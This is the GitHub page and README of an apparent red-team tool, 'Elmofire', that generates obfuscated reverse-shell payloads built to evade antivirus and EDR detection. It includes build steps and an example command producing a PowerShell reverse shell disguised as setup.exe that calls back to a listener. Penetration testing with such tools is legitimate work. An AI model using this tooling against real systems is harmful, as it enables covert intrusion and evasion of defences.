Skip to content

Elmofire/ef

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
src
src
 
 
Cargo.toml
Cargo.toml
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 

Repository files navigation

🔥Elmofire🔥

Version:

    0.1.0

Description:

Elmofire has been developed to keep up with the demand of Security Best Practices and Red Team exercises. During an assessment, typically Penetration Testers/Red Team Operators are tasked with bypassing current protections in place within corporate infrastuctures. As most Anti-Virus, likewise Endpoint Detection and Response (EDR) software solutions detect known malware samples based on heuristics and forensic fingerprinting, the goal of Elmofire is to bypass these detections. While not fully undetectable by every form of EDR on the planet 🌎, Elmofire does an excellent job at generating a randomized and obfuscated payload in an attempt to evade these malware detection services. Currently bypassing all known Anti-Virus solutions on VirusTotal, (Feel free to generate a payload and see for yourself. 😉), the payloads generated by Elmofire are very likely to evade most protection software utilized by organizations throughout the Cyber Security industry.

Dependencies:

NOTE:

    On Linux, Docker runs in the context of the root user by default. To use cross, which uses Docker to compile Rust binaries, it is advised to add your current user to the docker group. E.g. sudo usermod -aG docker user After executing the above command, run newgrp docker in the context of your user or simply logout and log back in.

Developed and tested on:

    Pop!_OS 22.04 (Ubuntu)
    Kali Linux 2022.4 (Debian)

Installation:

After following the instructions to install rust, docker, and cross, you can compile and build Elmofire using the cargo build command from inside the Elmofire source code folder.

E.g.

git clone https://github.com/Elmofire/ef

cd ef/

cargo build

Once successfully compiled without errors, the ef binary file will be located within the target/debug path within the Elmofire source code directory. Feel free to relocate this binary to your most convienent file path configured in your PATH environment, or simply create an alias to point to the current location of the ef binary.

Usage:

🔥ElmoFire🔥 0.1.0
Author: M4x 5yn74x
Description: Yet another obfuscated payload generator written in Rust

USAGE:
./ef -p <OS-Option> -a <Architecture> -l <Listener> -s <Shell-Type> -o <Output filename>


OPTIONS:
-a <Architecture>        Architecture: x86_64, i586, i686, arm, armv5te, armv7, aarch64, mips,
mipsel, mips64, mips64el
-h, --help               Print help information
-l <Listener>            Listening host: <listening ip:port>
-o <Output>              Output filename: <anything goes>
-p <OS-Option>           Operating System: windows, linux, darwin, ios, android, solaris,
sun-solaris, freebsd, netbsd, illumos
-s <Shell-Type>          Shell type: cmd, powershell, /bin/bash, /bin/sh, /system/bin/sh,
/bin/busybox, /usr/bin/zsh
-V, --version            Print version information

E.g.

./ef -a x86_64 -l 10.0.0.10:1337 -o setup.exe -p windows -s powershell

Disclaimer:

This tool is intended for Penetration Testers, Security Researchers and Red Teamers alike. DO NOT USE this tool for ILLEGAL purposes or WITHOUT the CONSENT from the parties involved while agreed upon by LEGAL DOCUMENTATION or PERMISSIVE ACCESS for security consultation or research purposes. We, hereby relinquish ALL responsiblity for any illegal use of this tool or ANY binary payloads subsequently generated by the tool as discribed. Please use Elmofire responsibly.

About

Yet another obfuscated payload generator written in Rust!

Resources

Readme

License

Apache-2.0 license
Activity

Stars

13 stars

Watchers

3 watching

Forks

2 forks
Report repository

Contributors

Languages